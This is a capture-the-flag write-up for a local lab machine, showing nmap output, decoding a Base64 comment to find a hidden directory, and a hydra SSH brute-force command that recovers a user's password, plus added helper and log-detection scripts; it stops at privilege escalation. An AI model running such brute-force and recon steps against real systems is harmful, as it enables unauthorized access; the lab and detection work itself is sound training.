Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 15:06 EST
Nmap scan report for 172.17.0.2
Host is up (0.000022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 a1:bc:79:1a:34:68:43:d5:f4:d8:65:76:4e:b4:6d:b1 (DSA)
| 2048 38:68:b6:3b:a3:b2:c9:39:a3:d5:f9:97:a9:5f:b3:ab (RSA)
| 256 d2:e2:87:58:d0:20:9b:d3:fe:f8:79:e3:23:4b:df:ee (ECDSA)
|_ 256 b7:38:8d:32:93:ec:4f:11:17:9d:86:3c:df:53:67:9a (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Andys's House
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: PARADISE)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: PARADISE)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: b501da0b8f9b
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: b501da0b8f9b
|_ System time: 2025-02-18T20:06:38+00:00
| smb2-time:
| date: 2025-02-18T20:06:39
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.56 seconds
If we open the page it looks ordinary, but if we click "Go paradise" and inspect the page source we find the following:
<!-- ZXN0b2VzdW5zZWNyZXRvCg== -->
The string is Base64-encoded, so we decode it:
echo "ZXN0b2VzdW5zZWNyZXRvCg==" | base64 -d
Info:
estoesunsecreto
It could be some user's password, but that leads nowhere; trying it as a directory in the URL, however, does work:
URL = http://<IP>/estoesunsecreto
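The two manual steps above (pull the comment out of the HTML, decode it) can be scripted so that no comment is overlooked on a larger site. This is an added example and not part of the original writeup; the HTML below is constructed inline so the script runs offline, and on a real target the page would come from `curl -s http://<IP>/` instead. It goes slightly beyond the page by testing every comment, not just the one found here.

```sh
# Added example, not from the original writeup: extract every single-line HTML
# comment from a page and base64-decode the ones that yield printable text.
# SAMPLE_HTML is constructed for this demo; replace with `curl -s http://<IP>/`.
set -eu

SAMPLE_HTML=$(cat <<'EOF'
<html><body>
<h1>Andys's House</h1>
<!-- this is a normal comment -->
<!-- ZXN0b2VzdW5zZWNyZXRvCg== -->
<a href="/paradise">Go paradise</a>
</body></html>
EOF
)

# Print the body of each single-line HTML comment, one per line.
extract_comments() {
    grep -o '<!--[^>]*-->' | sed -e 's/^<!--[[:space:]]*//' -e 's/[[:space:]]*-->$//'
}

# Print the decoded text if $1 is valid base64 that decodes to printable data;
# otherwise return 1 so callers can skip ordinary comments.
decode_if_base64() {
    candidate=$1
    case "$candidate" in
        ""|*[!A-Za-z0-9+/=]*) return 1 ;;   # characters outside the base64 alphabet
    esac
    decoded=$(printf '%s' "$candidate" | base64 -d 2>/dev/null) || return 1
    # Reject binary output: anything that is neither printable nor whitespace.
    if printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:][:space:]]'; then
        return 1
    fi
    printf '%s' "$decoded" | tr -d '\n'
}

# Read comment bodies from stdin and report the ones that decode cleanly.
find_secrets() {
    while IFS= read -r comment; do
        if decoded=$(decode_if_base64 "$comment"); then
            printf '%s -> %s\n' "$comment" "$decoded"
        fi
    done
}

printf '%s\n' "$SAMPLE_HTML" | extract_comments | find_secrets
```

The alphabet check in `decode_if_base64` is what keeps the normal comment out of the results: `base64 -d` alone would happily emit garbage for many short ASCII strings, so requiring the decoded bytes to be printable is the filter that makes this usable on a real page.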
There we find a file named mensaje_para_lucas.txt with the following content:
REMEMBER TO CHANGE YOUR PASSWORD ACCOUNT, BECAUSE YOUR PASSWORD IS DEBIL AND THE HACKERS CAN FIND USING B.F.
So the user lucas has a weak password, and we will brute-force it with hydra, trying SSH first.
Escalate user lucas
Hydra
hydra -l lucas -P <WORDLIST> ssh://<IP> -t 64
Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-18 15:11:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: lucas password: chocolate
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 7 final worker threads did not complete until end.
[ERROR] 7 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-18 15:11:13
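The run above is noisy from the server's side: every guess hydra makes is a "Failed password" line in the target's auth log, followed by one "Accepted password" from the same source. As an added example (not from the original writeup), the script below shows how that pattern is detected. The auth.log lines are constructed for this demo in the OpenSSH message format; on a real host you would feed it `/var/log/auth.log` instead. The threshold value is an assumption, not something the page specifies.

```sh
# Added example, not from the original writeup: flag SSH brute force in auth.log
# and, more importantly, a successful login that follows a burst of failures.
# SAMPLE_AUTH_LOG is constructed for this demo (OpenSSH sshd message format).
set -eu

SAMPLE_AUTH_LOG=$(cat <<'EOF'
Feb 18 15:11:11 ubuntu sshd[1201]: Failed password for lucas from 172.17.0.1 port 40122 ssh2
Feb 18 15:11:11 ubuntu sshd[1203]: Failed password for lucas from 172.17.0.1 port 40124 ssh2
Feb 18 15:11:12 ubuntu sshd[1205]: Failed password for lucas from 172.17.0.1 port 40130 ssh2
Feb 18 15:11:12 ubuntu sshd[1207]: Failed password for lucas from 172.17.0.1 port 40136 ssh2
Feb 18 15:11:12 ubuntu sshd[1209]: Failed password for invalid user admin from 172.17.0.1 port 40140 ssh2
Feb 18 15:11:13 ubuntu sshd[1211]: Failed password for lucas from 172.17.0.1 port 40150 ssh2
Feb 18 15:11:13 ubuntu sshd[1215]: Accepted password for lucas from 172.17.0.1 port 40180 ssh2
Feb 18 15:20:02 ubuntu sshd[1300]: Failed password for lucas from 10.0.0.5 port 51000 ssh2
Feb 18 15:20:30 ubuntu sshd[1302]: Accepted password for lucas from 10.0.0.5 port 51004 ssh2
EOF
)

# Read sshd log lines on stdin. $1 is the failure threshold (assumed value).
# Prints COMPROMISED when a login succeeds from an IP already over the threshold,
# and BRUTE_FORCE at the end for every IP over the threshold.
detect_bruteforce() {
    awk -v threshold="$1" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # The source IP is the field after "from"; this also covers the
            # "invalid user X" variant, where the user name is two fields earlier.
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            failed[ip]++
        }
        /sshd\[[0-9]+\]: Accepted password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
            if (failed[ip] >= threshold)
                printf "COMPROMISED %s from %s after %d failed attempts\n", user, ip, failed[ip]
        }
        END {
            for (ip in failed)
                if (failed[ip] >= threshold)
                    printf "BRUTE_FORCE %s failed=%d\n", ip, failed[ip]
        }
    '
}

printf '%s\n' "$SAMPLE_AUTH_LOG" | detect_bruteforce 5
```

The second source (10.0.0.5) is a user who mistyped once and then logged in; with the threshold at 5 it is not reported, while the hydra-style burst from 172.17.0.1 is reported twice: once as a brute-force source and once, the line that matters, as a compromised account.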
We have obtained credentials for the user lucas, so we log in over SSH. Note that hydra itself warned that SSH servers limit the number of parallel sessions and recommended -t 4; the "7 targets did not resolve or could not be connected" errors above are the cost of running with -t 64, which happened to find the password anyway.
SSH
ssh lucas@<IP>
We enter chocolate as the password and we are in.
Escalate Privileges
If we list the SUID binaries we have access to, we see the following: